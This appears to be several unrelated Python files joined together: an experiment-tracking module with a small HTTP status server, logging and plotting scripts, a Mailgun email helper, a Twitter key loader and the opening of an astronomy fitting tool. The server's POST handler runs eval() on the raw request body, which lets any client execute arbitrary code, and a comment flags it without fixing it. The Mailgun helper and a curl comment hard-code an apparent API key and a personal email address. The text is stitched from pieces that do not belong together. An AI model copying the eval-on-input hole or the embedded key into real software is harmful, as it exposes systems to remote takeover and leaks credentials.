				warn('Unable to connect to \'{0}:{1}\'.'.format(self.server, self.port))



	def progress(self, progress):
		"""
		Report progress (in percent) to the managing server.

		@type  progress: number
		@param progress: completion percentage, 0 to 100
		"""
		self.status('PROGRESS', progress=progress)



	def save(self, filename=None, overwrite=False):
		"""
		Store results. If a filename is given, the default is overwritten.

		@type  filename: string
		@param filename: path to where the experiment will be stored

		@type  overwrite: boolean
		@param overwrite: overwrite existing files
		"""

		self.duration = time() - self.time

		if filename is None:
			filename = self.filename
		else:
			# replace {0} and {1} by date and time
			tmp1 = strftime('%d%m%Y', localtime(time()))
			tmp2 = strftime('%H%M%S', localtime(time()))
			filename = filename.format(tmp1, tmp2)

			self.filename = filename

		# make sure directory exists
		try:
			os.makedirs(path.dirname(filename))
		except OSError:
			# directory already exists (or path is empty)
			pass

		# make sure filename is unique
		counter = 0
		pieces = path.splitext(filename)

		if not overwrite:
			# append .1, .2, ... before the extension until the name is free
			while path.exists(filename):
				counter += 1
				filename = pieces[0] + '.' + str(counter) + pieces[1]

			if counter:
				warn(''.join(pieces) + ' already exists. Saving to ' + filename + '.')

		# store experiment (pickle protocol 1)
		with open(filename, 'wb') as handle:
			dump({
				'version': __version__,
				'id': self.id,
				'time': self.time,
				'seed': self.seed,
				'duration': self.duration,
				'environ': self.environ,
				'hostname': self.hostname,
				'cwd': self.cwd,
				'argv': self.argv,
				'script': self.script,
				'script_path': self.script_path,
				'processors': self.processors,
				'platform': self.platform,
				'comment': self.comment,
				'commit': self.commit,
				'modified': self.modified,
				'versions': self.versions,
				'results': self.results}, handle, 1)

		self.status('SAVE', filename=filename, duration=self.duration)



	def load(self, filename=None):
		"""
		Loads experimental results from the specified file.

		@type  filename: string
		@param filename: path to where the experiment is stored
		"""

		if filename:
			self.filename = filename

		with open(self.filename, 'rb') as handle:
			# 'load' is the module-level helper defined later in this file,
			# which unpickles via XUnpickler for numpy compatibility.
			res = load(handle)

			self.time = res['time']
			self.seed = res['seed']
			self.duration = res['duration']
			self.processors = res['processors']
			self.environ = res['environ']
			self.platform = res['platform']
			self.comment = res['comment']
			self.commit = res['commit']
			self.modified = res['modified']
			self.versions = res['versions']
			self.results = res['results']
			# fields below were added in later file-format versions;
			# older files yield None
			self.argv = res['argv'] \
				if StrictVersion(res['version']) >= '0.3.1' else None
			self.script = res['script'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.script_path = res['script_path'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.cwd = res['cwd'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.hostname = res['hostname'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.id = res['id'] \
				if StrictVersion(res['version']) >= '0.4.0' else None



	def __getitem__(self, key):
		"""Return the result stored under C{key}."""
		return self.results[key]



	def __setitem__(self, key, value):
		"""Store C{value} as a result under C{key}."""
		self.results[key] = value



	def __delitem__(self, key):
		"""Remove the result stored under C{key}."""
		del self.results[key]



class ExperimentRequestHandler(BaseHTTPRequestHandler):
	"""
	Renders HTML showing running and finished experiments.

	State is kept in class-level dictionaries (shared by all request
	handler instances), keyed by experiment id:

	- C{running}: experiments that have reported a status via POST
	- C{finished}: experiments that have reported a 'SAVE' status
	- C{xpck_path}: colon-separated list of directories scanned for .xpck files
	"""

	xpck_path = ''
	running = {}
	finished = {}

	def do_GET(self):
		"""
		Renders HTML displaying running and saved experiments.

		Routes: /version/ (plain-text version probe used by Experiment.status),
		/running/<id>/, /finished/<id>/, and the index page for everything else.
		"""

		# number of bars representing progress
		max_bars = 20

		if self.path == '/version/':
			self.send_response(200)
			self.send_header('Content-type', 'text/plain')
			self.end_headers()

			self.wfile.write('Experiment {0}'.format(__version__))

		elif self.path.startswith('/running/'):
			id = int([s for s in self.path.split('/') if s != ''][-1])

			# display running experiment
			if id in ExperimentRequestHandler.running:
				self.send_response(200)
				self.send_header('Content-type', 'text/html')
				self.end_headers()

				self.wfile.write(HTML_HEADER)
				self.wfile.write('<h2>Experiment</h2>')

				instance = ExperimentRequestHandler.running[id]

				# floor division keeps num_bars an int (Python 3 safe)
				num_bars = int(instance['progress']) * max_bars // 100

				self.wfile.write('<table>')
				self.wfile.write('<tr><th>Experiment:</th><td>{0}</td></tr>'.format(
					os.path.join(instance['cwd'], instance['script_path'])))
				self.wfile.write('<tr><th>Hostname:</th><td>{0}</td></tr>'.format(instance['hostname']))
				self.wfile.write('<tr><th>Status:</th><td class="running">{0}</td></tr>'.format(instance['status']))
				self.wfile.write('<tr><th>Progress:</th><td class="progress"><span class="bars">{0}</span>{1}</td></tr>'.format(
					'|' * num_bars, '|' * (max_bars - num_bars)))
				self.wfile.write('<tr><th>Start:</th><td>{0}</td></tr>'.format(
					strftime('%a, %d %b %Y %H:%M:%S', localtime(instance['time']))))
				self.wfile.write('<tr><th>Comment:</th><td>{0}</td></tr>'.format(
					instance['comment'] if instance['comment'] else '-'))
				self.wfile.write('</table>')

				self.wfile.write('<h2>Script</h2>')
				self.wfile.write('<pre>{0}</pre>'.format(instance['script']))
				self.wfile.write(HTML_FOOTER)

			elif id in ExperimentRequestHandler.finished:
				# experiment completed since the link was rendered: redirect
				self.send_response(302)
				self.send_header('Location', '/finished/{0}/'.format(id))
				self.end_headers()

			else:
				self.send_response(200)
				self.send_header('Content-type', 'text/html')
				self.end_headers()

				self.wfile.write(HTML_HEADER)
				self.wfile.write('<h2>404</h2>')
				self.wfile.write('Requested experiment not found.')
				self.wfile.write(HTML_FOOTER)

		elif self.path.startswith('/finished/'):
			self.send_response(200)
			self.send_header('Content-type', 'text/html')
			self.end_headers()

			self.wfile.write(HTML_HEADER)

			id = int([s for s in self.path.split('/') if s != ''][-1])

			# display finished experiment
			if id in ExperimentRequestHandler.finished:
				instance = ExperimentRequestHandler.finished[id]

				if id in ExperimentRequestHandler.running:
					progress = ExperimentRequestHandler.running[id]['progress']
				else:
					progress = 100

				num_bars = int(progress) * max_bars // 100

				self.wfile.write('<h2>Experiment</h2>')
				self.wfile.write('<table>')
				self.wfile.write('<tr><th>Experiment:</th><td>{0}</td></tr>'.format(
					os.path.join(instance['cwd'], instance['script_path'])))
				self.wfile.write('<tr><th>Results:</th><td>{0}</td></tr>'.format(
					os.path.join(instance['cwd'], instance['filename'])))
				self.wfile.write('<tr><th>Status:</th><td class="finished">{0}</td></tr>'.format(instance['status']))
				self.wfile.write('<tr><th>Progress:</th><td class="progress"><span class="bars">{0}</span>{1}</td></tr>'.format(
					'|' * num_bars, '|' * (max_bars - num_bars)))
				self.wfile.write('<tr><th>Start:</th><td>{0}</td></tr>'.format(
					strftime('%a, %d %b %Y %H:%M:%S', localtime(instance['time']))))
				self.wfile.write('<tr><th>End:</th><td>{0}</td></tr>'.format(
					strftime('%a, %d %b %Y %H:%M:%S', localtime(instance['duration']))))
				self.wfile.write('<tr><th>Comment:</th><td>{0}</td></tr>'.format(
					instance['comment'] if instance['comment'] else '-'))
				self.wfile.write('</table>')

				self.wfile.write('<h2>Results</h2>')

				try:
					experiment = Experiment(os.path.join(instance['cwd'], instance['filename']))
				except:
					self.wfile.write('Could not open file.')
				else:
					self.wfile.write('<table>')
					for key, value in experiment.results.items():
						self.wfile.write('<tr><th>{0}</th><td>{1}</td></tr>'.format(key, value))
					self.wfile.write('</table>')

				self.wfile.write('<h2>Script</h2>')
				self.wfile.write('<pre>{0}</pre>'.format(instance['script']))


			else:
				self.wfile.write('<h2>404</h2>')
				self.wfile.write('Requested experiment not found.')

			self.wfile.write(HTML_FOOTER)

		else:
			# index page: collect stored .xpck files from configured paths
			files = []

			if 'xpck_path' in ExperimentRequestHandler.__dict__:
				if ExperimentRequestHandler.xpck_path != '':
					# 'directory' avoids shadowing the module-level 'path'
					# imported from os
					for directory in ExperimentRequestHandler.xpck_path.split(':'):
						files += [os.path.join(directory, f) for f in os.listdir(directory) if f.endswith('.xpck')]
				
			if 'XPCK_PATH' in os.environ:
				for directory in os.environ['XPCK_PATH'].split(':'):
					files += [os.path.join(directory, f) for f in os.listdir(directory) if f.endswith('.xpck')]

			self.send_response(200)
			self.send_header('Content-type', 'text/html')
			self.end_headers()

			self.wfile.write(HTML_HEADER)
			self.wfile.write('<h2>Running</h2>')

			# display running experiments
			if ExperimentRequestHandler.running:
				self.wfile.write('<table>')
				self.wfile.write('<tr>')
				self.wfile.write('<th>Experiment</th>')
				self.wfile.write('<th>Hostname</th>')
				self.wfile.write('<th>Status</th>')
				self.wfile.write('<th>Progress</th>')
				self.wfile.write('<th>Start</th>')
				self.wfile.write('<th>Comment</th>')
				self.wfile.write('</tr>')

				# sort ids by start time of experiment, newest first;
				# list() makes keys() indexable (required on Python 3)
				times = [instance['time'] for instance in ExperimentRequestHandler.running.values()]
				ids = list(ExperimentRequestHandler.running.keys())
				ids = [ids[i] for i in argsort(times)][::-1]

				for id in ids:
					instance = ExperimentRequestHandler.running[id]
					num_bars = int(instance['progress']) * max_bars // 100

					self.wfile.write('<tr>')
					self.wfile.write('<td class="filepath"><a href="/running/{1}/">{0}</a></td>'.format(
						instance['script_path'], instance['id']))
					self.wfile.write('<td>{0}</td>'.format(instance['hostname']))
					self.wfile.write('<td class="running">{0}</td>'.format(instance['status']))
					self.wfile.write('<td class="progress"><span class="bars">{0}</span>{1}</td>'.format(
						'|' * num_bars, '|' * (max_bars - num_bars)))
					self.wfile.write('<td>{0}</td>'.format(strftime('%a, %d %b %Y %H:%M:%S',
						localtime(instance['time']))))
					self.wfile.write('<td class="comment">{0}</td>'.format(
						instance['comment'] if instance['comment'] else '-'))
					self.wfile.write('</tr>')

				self.wfile.write('</table>')

			else:
				self.wfile.write('No running experiments.')

			self.wfile.write('<h2>Saved</h2>')

			# display saved experiments
			if ExperimentRequestHandler.finished:
				self.wfile.write('<table>')
				self.wfile.write('<tr>')
				self.wfile.write('<th>Results</th>')
				self.wfile.write('<th>Status</th>')
				self.wfile.write('<th>Progress</th>')
				self.wfile.write('<th>Start</th>')
				self.wfile.write('<th>End</th>')
				self.wfile.write('<th>Comment</th>')
				self.wfile.write('</tr>')

				# sort ids by end time of experiment, newest first
				times = [instance['time'] + instance['duration']
					for instance in ExperimentRequestHandler.finished.values()]
				ids = list(ExperimentRequestHandler.finished.keys())
				ids = [ids[i] for i in argsort(times)][::-1]

				for id in ids:
					instance = ExperimentRequestHandler.finished[id]

					if id in ExperimentRequestHandler.running:
						progress = ExperimentRequestHandler.running[id]['progress']
					else:
						progress = 100

					num_bars = int(progress) * max_bars // 100

					self.wfile.write('<tr>')
					self.wfile.write('<td class="filepath"><a href="/finished/{1}/">{0}</a></td>'.format(
						instance['filename'], instance['id']))
					self.wfile.write('<td class="finished">saved</td>')
					self.wfile.write('<td class="progress"><span class="bars">{0}</span>{1}</td>'.format(
						'|' * num_bars, '|' * (max_bars - num_bars)))
					self.wfile.write('<td>{0}</td>'.format(strftime('%a, %d %b %Y %H:%M:%S',
						localtime(instance['time']))))
					self.wfile.write('<td>{0}</td>'.format(strftime('%a, %d %b %Y %H:%M:%S',
						localtime(instance['time'] + instance['duration']))))
					self.wfile.write('<td class="comment">{0}</td>'.format(
						instance['comment'] if instance['comment'] else '-'))
					self.wfile.write('</tr>')

				self.wfile.write('</table>')

			else:
				self.wfile.write('No saved experiments.')

			self.wfile.write(HTML_FOOTER)



	def do_POST(self):
		"""
		Ingest a status report posted by Experiment.status().

		The body is the repr of a dict.  SECURITY: eval() on the request body
		executes arbitrary code from any client that can reach this port —
		replace with ast.literal_eval() once clients are verified to send
		plain literals.
		"""
		instances = ExperimentRequestHandler.running
		instance = eval(self.rfile.read(int(self.headers['Content-Length'])))

		# BUGFIX: the original compared string literals with 'is', which
		# relies on CPython interning and is not guaranteed to work
		if instance['status'] == 'PROGRESS':
			if instance['id'] not in instances:
				instances[instance['id']] = instance
				instances[instance['id']]['status'] = 'running'
			instances[instance['id']]['progress'] = instance['progress']

		elif instance['status'] == 'SAVE':
			ExperimentRequestHandler.finished[instance['id']] = instance
			ExperimentRequestHandler.finished[instance['id']]['status'] = 'saved'

		else:
			# any other status: store/replace, preserving known progress
			if instance['id'] in instances:
				progress = instances[instance['id']]['progress']
			else:
				progress = 0
			instances[instance['id']] = instance
			instances[instance['id']]['progress'] = progress

		# status None means the experiment object was destroyed
		if instance['status'] is None:
			try:
				del instances[instance['id']]
			except:
				# already removed; best effort
				pass



class XUnpickler(Unpickler):
	"""
	An Unpickler subclass that papers over numpy's backwards-incompatible
	module renames so that old pickles still load.
	"""

	def find_class(self, module, name):
		"""
		Resolve C{module}.C{name}, remapping renamed numpy modules first.
		"""

		try:
			# numpy >= 1.5 moved defmatrix out of numpy.core
			recent_numpy = StrictVersion(numpy.__version__) >= '1.5.0'
			if recent_numpy and module == 'numpy.core.defmatrix':
				module = 'numpy.matrixlib.defmatrix'
		except ValueError:
			# unparsable numpy version string; fall through unmodified
			pass

		return Unpickler.find_class(self, module, name)



def load(file):
	"""Unpickle the contents of an open file object via XUnpickler."""
	unpickler = XUnpickler(file)
	return unpickler.load()
		


def main(argv):
	"""
	Load and display experiment information, or run the experiment server.

	@type  argv: list
	@param argv: command line arguments; argv[0] is the program name

	@rtype: integer
	@return: 0 on success
	"""

	if len(argv) < 2:
		# single-argument print() behaves identically on Python 2 and 3
		print('Usage: {0} [--server] [--port=<port>] [--path=<path>] [filename]'.format(argv[0]))
		return 0

	optlist, argv = getopt(argv[1:], '', ['server', 'port=', 'path='])
	optlist = dict(optlist)

	if '--server' in optlist:
		try:
			ExperimentRequestHandler.xpck_path = optlist.get('--path', '')
			# BUGFIX: getopt yields strings; HTTPServer needs an integer port
			port = int(optlist.get('--port', 8000))

			# start server
			server = HTTPServer(('', port), ExperimentRequestHandler)
			server.serve_forever()

		except KeyboardInterrupt:
			server.socket.close()

		return 0

	# load experiment
	# BUGFIX: use the post-getopt positional arguments; sys.argv[1] would be
	# an option string whenever options were passed before the filename
	experiment = Experiment(argv[0])

	if len(argv) > 1:
		# print the requested result entries, trying string keys first
		for arg in argv[1:]:
			try:
				print(experiment[arg])
			except:
				print(experiment[int(arg)])
		return 0

	# print summary of experiment
	print(experiment)

	return 0



# Shared page chrome: every server-rendered page is wrapped in
# HTML_HEADER ... HTML_FOOTER (inline CSS, no external assets).
HTML_HEADER = '''<html>
	<head>
		<title>Experiments</title>
		<style type="text/css">
			body {
				font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
				font-size: 11pt;
				color: black;
				background: white;
				padding: 0pt 20pt;
			}

			h2 {
				margin-top: 20pt;
				font-size: 16pt;
			}

			table {
				border-collapse: collapse;
			}

			tr:nth-child(even) {
				background: #f4f4f4;
			}

			th {
				font-size: 12pt;
				text-align: left;
				padding: 2pt 10pt 3pt 0pt;
			}

			td {
				font-size: 10pt;
				padding: 3pt 10pt 2pt 0pt;
			}

			pre {
				font-size: 10pt;
				background: #f4f4f4;
				padding: 5pt;
			}

			a {
				text-decoration: none;
				color: #04a;
			}

			.running {
				color: #08b;
			}

			.finished {
				color: #390;
			}

			.comment {
				min-width: 200pt;
				font-style: italic;
			}

			.progress {
				color: #ccc;
			}

			.progress .bars {
				color: black;
			}
		</style>
	</head>
	<body>'''

HTML_FOOTER = '''
	</body>
</html>'''



# Command line entry point.
if __name__ == '__main__':
	sys.exit(main(sys.argv))

import traceback


class EnsureExceptionHandledGuard:
    """Helper for ensuring that Future's exceptions were handled.

    A Future that stores an exception nobody ever retrieves would fail
    silently.  Attaching a __del__ to the Future itself would stop the
    garbage collector from breaking reference cycles, so the Future instead
    holds one of these small helper objects: when the Future is collected
    with the exception still unretrieved, the helper is collected too and
    its __del__ logs the traceback.  Calling clear() (done when result() or
    exception() is invoked) disarms the helper.

    To stay out of reference cycles the helper never keeps the exception
    past activate(): it stores only the pre-formatted traceback strings.
    Formatting is deferred to activate(), which runs after the Future's
    callbacks, because a typical callback retrieves the exception and
    removes the helper before any formatting work is needed.
    """

    __slots__ = ['exc', 'tb', 'hndl', 'cls']

    def __init__(self, exc, handler):
        # Hold the raw exception only until activate() turns it into text.
        self.exc = exc
        self.hndl = handler
        self.cls = type(exc)
        self.tb = None

    def activate(self):
        """Format the traceback now and drop the exception reference."""
        exc, self.exc = self.exc, None
        if exc is not None:
            self.tb = traceback.format_exception(
                exc.__class__, exc, exc.__traceback__)

    def clear(self):
        """Disarm the guard so __del__ logs nothing."""
        self.exc = None
        self.tb = None

    def __del__(self):
        tb = self.tb
        if tb:
            self.hndl(self.cls, tb)

# NOTE(review): this __package__ override looks like a leftover from another
# module ('archivebox.core') — confirm it belongs here.
__package__ = 'archivebox.core'

import logging.handlers
import os

# Shared logger used by the LogPABot* helpers below.
_pabotlog = logging.getLogger('PABot')

_pabotlog.setLevel(logging.DEBUG)

_logPath = os.path.abspath("./logging/pabot.log")

# BUGFIX: RotatingFileHandler raises if the target directory is missing,
# so create it up front (isdir check keeps this Python-2 compatible).
_logDir = os.path.dirname(_logPath)
if not os.path.isdir(_logDir):
    os.makedirs(_logDir)

_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')

# Mirror all records to the console...
_consoleStreamHandler = logging.StreamHandler()
_consoleStreamHandler.setLevel(logging.DEBUG)
_consoleStreamHandler.setFormatter(_formatter)

# ...and to a size-capped rotating file (5 backups of ~2 MB each).
_symLogRotFileHandler = logging.handlers.RotatingFileHandler(_logPath, maxBytes=2000000, backupCount=5)
_symLogRotFileHandler.setLevel(logging.DEBUG)
_symLogRotFileHandler.setFormatter(_formatter)

_pabotlog.addHandler(_consoleStreamHandler)
_pabotlog.addHandler(_symLogRotFileHandler)


def LogPABotMessage(message):
    """Log *message* at INFO level to the shared 'PABot' logger."""
    _pabotlog.info(message)


def LogPABotError(message):
    """Log *message* at ERROR level to the shared 'PABot' logger."""
    _pabotlog.error(message)

import ast
import heisenberg.library.heisenberg_dynamics_context
import heisenberg.library.orbit_plot
import heisenberg.option_parser
import heisenberg.plot
import heisenberg.util
import matplotlib
import numpy as np
import sys

# https://github.com/matplotlib/matplotlib/issues/5907 says this should fix "Exceeded cell block limit" problems
matplotlib.rcParams['agg.path.chunksize'] = 10000

# Numeric (floating point) dynamics for the Heisenberg problem.
dynamics_context = heisenberg.library.heisenberg_dynamics_context.Numeric()

op = heisenberg.option_parser.OptionParser(module=heisenberg.plot)
# Add the subprogram-specific options here.
op.add_option(
    '--initial-preimage',
    dest='initial_preimage',
    type='string',
    help='Specifies the preimage of the initial conditions with respect to the embedding map specified by the --embedding-dimension and --embedding-solution-sheet-index option values.  Should have the form [x_1,...,x_n], where n is the embedding dimension and x_i is a floating point literal for each i.'
)
op.add_option(
    '--initial',
    dest='initial',
    type='string',
    help='Specifies the initial conditions [x,y,z,p_x,p_y,p_z], where each of x,y,z,p_x,p_y,p_z are floating point literals.'
)
op.add_option(
    '--optimization-iterations',
    dest='optimization_iterations',
    default=1000,
    type='int',
    help='Specifies the number of iterations to run the optimization for (if applicable).  Default is 1000.'
)
op.add_option(
    '--optimize-initial',
    dest='optimize_initial',
    action='store_true',
    default=False,
    help='Indicates that the specified initial condition (via whichever of the --initial... options) should be used as the starting point for an optimization to attempt to close the orbit.  Default value is False.'
)
op.add_option(
    '--output-dir',
    dest='output_dir',
    default='.',
    help='Specifies the directory to write plot images and data files to.  Default is current directory.'
)
op.add_option(
    '--disable-plot-initial',
    dest='disable_plot_initial',
    action='store_true',
    default=False,
    help='Disables plotting the initial curve; only has effect if --optimize-initial is specified.'
)

options,args = op.parse_argv_and_validate()
if options is None:
    sys.exit(-1)

# Exactly one way of specifying the initial condition must be used.
num_initial_conditions_specified = sum([
    options.initial_preimage is not None,
    options.initial is not None,
])
if num_initial_conditions_specified != 1:
    print('Some initial condition option must be specified; --initial-preimage, --initial.  However, {0} of those were specified.'.format(num_initial_conditions_specified))
    op.print_help()
    sys.exit(-1)

# Validate subprogram-specific options here.

# Attempt to parse initial conditions.  Upon success, the attribute options.qp_0 should exist.
# NOTE(review): options.embedding_dimension, options.embedding_solution_sheet_index
# and options.seed are presumably defined by the shared OptionParser — confirm.
if options.initial_preimage is not None:
    try:
        options.initial_preimage = np.array(ast.literal_eval(options.initial_preimage))
        expected_shape = (options.embedding_dimension,)
        if options.initial_preimage.shape != expected_shape:
            raise ValueError('--initial-preimage value had the wrong number of components (got {0} but expected {1}).'.format(options.initial_preimage.shape, expected_shape))
        options.qp_0 = dynamics_context.embedding(N=options.embedding_dimension, sheet_index=options.embedding_solution_sheet_index)(options.initial_preimage)
    except Exception as e:
        print('error parsing --initial-preimage value; error was {0}'.format(e))
        op.print_help()
        sys.exit(-1)
elif options.initial is not None:
    try:
        options.initial = heisenberg.util.csv_as_ndarray(heisenberg.util.pop_brackets_off_of(options.initial), float)
        expected_shape = (6,)
        if options.initial.shape != expected_shape:
            raise ValueError('--initial value had the wrong number of components (got {0} but expected {1}).'.format(options.initial.shape, expected_shape))
        # reshape flat [x,y,z,p_x,p_y,p_z] into position/momentum pairs
        options.qp_0 = options.initial.reshape(2,3)
    except ValueError as e:
        print('error parsing --initial value: {0}'.format(str(e)))
        op.print_help()
        sys.exit(-1)
else:
    assert False, 'this should never happen because of the check with num_initial_conditions_specified'

rng = np.random.RandomState(options.seed)
heisenberg.plot.plot(dynamics_context, options, rng=rng)

def send_simple_message():
    """Send a canned test email through the Mailgun sandbox domain.

    :return: the ``requests.Response`` from the Mailgun messages endpoint.
    """
    import os

    # SECURITY: the API key was hard-coded here (and remains as a fallback so
    # existing deployments keep working) — it is exposed in source control, so
    # rotate it and supply MAILGUN_API_KEY via the environment instead.
    api_key = os.environ.get("MAILGUN_API_KEY", "key-679dc79b890e700f11f001a6bf86f4a1")

    return requests.post(
        "https://api.mailgun.net/v3/sandbox049ff464a4d54974bb0143935f9577ef.mailgun.org/messages",
        auth=("api", api_key),
        data={"from": "Mailgun Sandbox <postmaster@sandbox049ff464a4d54974bb0143935f9577ef.mailgun.org>",
              "to": "nick <nicorellius@gmail.com>",
              "subject": "Hello nick",
              "text": "Congratulations nick, you just sent an email with Mailgun!  You are truly awesome!  You can see a record of this email in your logs: https://mailgun.com/cp/log .  You can send up to 300 emails/day from this sandbox server.  Next, you should add your own domain so you can send 10,000 emails/month for free."})


# cURL command to send mail with API key
# curl -s --user 'api:key-679dc79b890e700f11f001a6bf86f4a1' \
#     https://api.mailgun.net/v3/mail.pdxpixel.com/messages \
#     -F from='Excited User <mailgun@pdxpixel.com>' \
#     -F to=nick@pdxpixel.com \
#     -F subject='Hello' \
#     -F text='Testing some Mailgun awesomness!'

def load_keys(filepath):
    """
    Loads the Twitter API keys into a dict.

    Each non-blank line of the config file must have the form ``key = value``.

    :param filepath: file path to config file with Twitter API keys.
    :return: keys_dict
    :raise: IOError
    """
    try:
        keys = {}
        # BUGFIX: 'with' guarantees the handle is closed (the original leaked
        # it), and text mode lets str.split work on Python 3 as well.
        with open(filepath) as keys_file:
            for line in keys_file:
                # skip blank lines, which would otherwise break the unpacking
                if not line.strip():
                    continue
                key, value = line.split('=')
                keys[key.strip()] = value.strip()
    except IOError:
        message = ('File {} cannot be opened.'
                   ' Check that it exists and is binary.')
        print(message.format(filepath))
        raise
    except:
        print("Error opening or unpickling file.")
        raise
    return keys

"""Main entry points for scripts."""

from __future__ import print_function, division

from argparse import ArgumentParser
from collections import OrderedDict
from copy import copy
from datetime import datetime
import glob
import json
import logging
import math
import os

import scipy.stats
import numpy as np

from .version import __version__
from .psffuncs import gaussian_moffat_psf
from .psf import TabularPSF, GaussianMoffatPSF
from .io import read_datacube, write_results, read_results
from .fitting import (guess_sky, fit_galaxy_single, fit_galaxy_sky_multi,
                      fit_position_sky, fit_position_sky_sn_multi,
                      RegularizationPenalty)
from .utils import yxbounds
from .extern import ADR, Hyper_PSF3D_PL


__all__ = ["cubefit", "cubefit_subtract", "cubefit_plot"]

MODEL_SHAPE = (32, 32)
SPAXEL_SIZE = 0.43
MIN_NMAD = 2.5  # Minimum Number of Median Absolute Deviations above
                # the minimum spaxel value in fit_position
LBFGSB_FACTOR = 1e10
REFWAVE = 5000.  # reference wavelength in Angstroms for PSF params and ADR
POSITION_BOUND = 3.  # Bound on fitted positions relative to initial positions

def snfpsf(wave, psfparams, header, psftype):
    """Build a 3-d PSF from the SNFactory-specific Gaussian+Moffat
    parameterization plus ADR, evaluated at each wavelength in `wave`."""

    # Gaussian+Moffat shape parameters as a function of wavelength.
    relwave = wave / REFWAVE - 1.0
    ell = abs(psfparams[0]) * np.ones_like(wave)
    alpha = np.abs(psfparams[1] +
                   psfparams[2] * relwave +
                   psfparams[3] * relwave**2)

    # Parameters tied to alpha (coefficients determined externally).
    sigma = 0.545 + 0.215 * alpha  # Gaussian width
    beta = 1.685 + 0.345 * alpha   # Moffat shape
    eta = 1.040 + 0.0 * alpha      # Gaussian ampl. / Moffat ampl.

    # Atmospheric differential refraction (ADR): the PSF center shifts
    # with wavelength by an amount we can determine (pretty well) from
    # the atmospheric conditions and the instrument pointing/angle; the
    # per-wavelength offsets computed here feed straight into the model.
    #
    # delta/theta are corrections to parallactic angle and airmass for
    # 2nd-order effects (MLA rotation, mechanical flexures,
    # finite-exposure corrections), trained on faint-std star exposures.
    # `predict_adr_params` reads 'AIRMASS', 'PARANG' and 'CHANNEL' from
    # the header dictionary.
    delta, theta = Hyper_PSF3D_PL.predict_adr_params(header)

    # Guard against out-of-range pressure/temperature readings by
    # falling back to default values.
    pressure = header.get('PRESSURE', 617.)
    if not 550. < pressure < 650.:
        pressure = 617.
    temp = header.get('TEMP', 2.)
    if not -20. < temp < 20.:
        temp = 2.

    adr = ADR(pressure, temp, lref=REFWAVE, delta=delta, theta=theta)
    # refract() returns a (2, nwave) array: row 0 is x, row 1 is y.
    xctr, yctr = adr.refract(0, 0, wave, unit=SPAXEL_SIZE)

    if psftype == 'gaussian-moffat':
        return GaussianMoffatPSF(sigma, alpha, beta, ell, eta,
                                 yctr, xctr, MODEL_SHAPE, subpix=3)
    if psftype == 'tabular':
        # "tabular" currently means: tabulate the same Gaussian+Moffat PSF.
        tab = gaussian_moffat_psf(sigma, alpha, beta, ell, eta,
                                  yctr, xctr, MODEL_SHAPE, subpix=3)
        return TabularPSF(tab)
    raise ValueError("unknown psf type: " + repr(psftype))


def setup_logging(loglevel, logfname=None):
    """Configure root logging for the cubefit command-line tools.

    `loglevel` may be a numeric level or a name such as "debug"/"info";
    an unrecognized name prints an error and exits the process. When
    `logfname` is given, any pre-existing file at that path is removed
    and log records are written there; otherwise basicConfig's default
    stream is used.
    """
    # Translate a level name ("debug", "info", ...) to its numeric value.
    if not isinstance(loglevel, int):
        loglevel = getattr(logging, loglevel.upper(), None)
        if not isinstance(loglevel, int):
            print('Invalid log level: %s' % loglevel)
            exit(1)

    # Start each run with a fresh log file.
    if logfname is not None and os.path.exists(logfname):
        os.remove(logfname)

    logging.basicConfig(filename=logfname, format="%(levelname)s %(message)s",
                        level=loglevel)


def cubefit(argv=None):
    """Fit the SN + galaxy model to a set of SNFactory data cubes.

    Command-line entry point (``cubefit``). Reads a JSON configuration
    file describing the data cubes, initial positions and PSF parameters,
    then runs the multi-step fit:

    1. fit the galaxy model to the master final ref,
    2. fit positions/skies of the other final refs,
    3. refit the galaxy model using all final refs,
    4. fit positions, skies and SN spectra of the non-ref epochs,
    5. optionally (``--refitgal``) refit the galaxy using all epochs and
       repeat step 4.

    Results are written to ``outfile`` (FITS); intermediate results are
    optionally written to ``--diagdir``.

    Parameters
    ----------
    argv : list of str, optional
        Command-line arguments; defaults to ``sys.argv[1:]``.

    Returns
    -------
    int
        0 on success (suitable as a process exit status).
    """

    DESCRIPTION = "Fit SN + galaxy model to SNFactory data cubes."

    parser = ArgumentParser(prog="cubefit", description=DESCRIPTION)
    parser.add_argument("configfile",
                        help="configuration file name (JSON format)")
    parser.add_argument("outfile", help="Output file name (FITS format)")
    parser.add_argument("--dataprefix", default="",
                        help="path prepended to data file names; default is "
                        "empty string")
    parser.add_argument("--logfile", help="Write log to this file "
                        "(default: print to stdout)", default=None)
    parser.add_argument("--loglevel", default="info",
                        help="one of: debug, info, warning (default is info)")
    parser.add_argument("--diagdir", default=None,
                        help="If given, write intermediate diagnostic results "
                        "to this directory")
    parser.add_argument("--refitgal", default=False, action="store_true",
                        help="Add an iteration where galaxy model is fit "
                        "using all epochs and then data/SN positions are "
                        "refit")
    parser.add_argument("--mu_wave", default=0.07, type=float,
                        help="Wavelength regularization parameter. "
                        "Default is 0.07.")
    parser.add_argument("--mu_xy", default=0.001, type=float,
                        help="Spatial regularization parameter. "
                        "Default is 0.001.")
    parser.add_argument("--psftype", default="gaussian-moffat",
                        help="Type of PSF: 'gaussian-moffat' or 'tabular'. "
                        "Currently, tabular means generate a tabular PSF from "
                        "gaussian-moffat parameters.")
    args = parser.parse_args(argv)

    setup_logging(args.loglevel, logfname=args.logfile)

    # record start time
    tstart = datetime.now()
    logging.info("cubefit v%s started at %s", __version__,
                 tstart.strftime("%Y-%m-%d %H:%M:%S"))
    tsteps = OrderedDict()  # finish time of each step.

    logging.info("parameters: mu_wave={:.3g} mu_xy={:.3g} refitgal={}"
                 .format(args.mu_wave, args.mu_xy, args.refitgal))
    logging.info("            psftype={}".format(args.psftype))

    logging.info("reading config file")
    with open(args.configfile) as f:
        cfg = json.load(f)

    # basic checks on config contents.
    assert (len(cfg["filenames"]) == len(cfg["xcenters"]) ==
            len(cfg["ycenters"]) == len(cfg["psf_params"]))

    # -------------------------------------------------------------------------
    # Load data cubes from the list of FITS files.

    nt = len(cfg["filenames"])

    logging.info("reading %d data cubes", nt)
    cubes = []
    for fname in cfg["filenames"]:
        logging.debug("  reading %s", fname)
        cubes.append(read_datacube(os.path.join(args.dataprefix, fname)))
    wave = cubes[0].wave
    nw = len(wave)

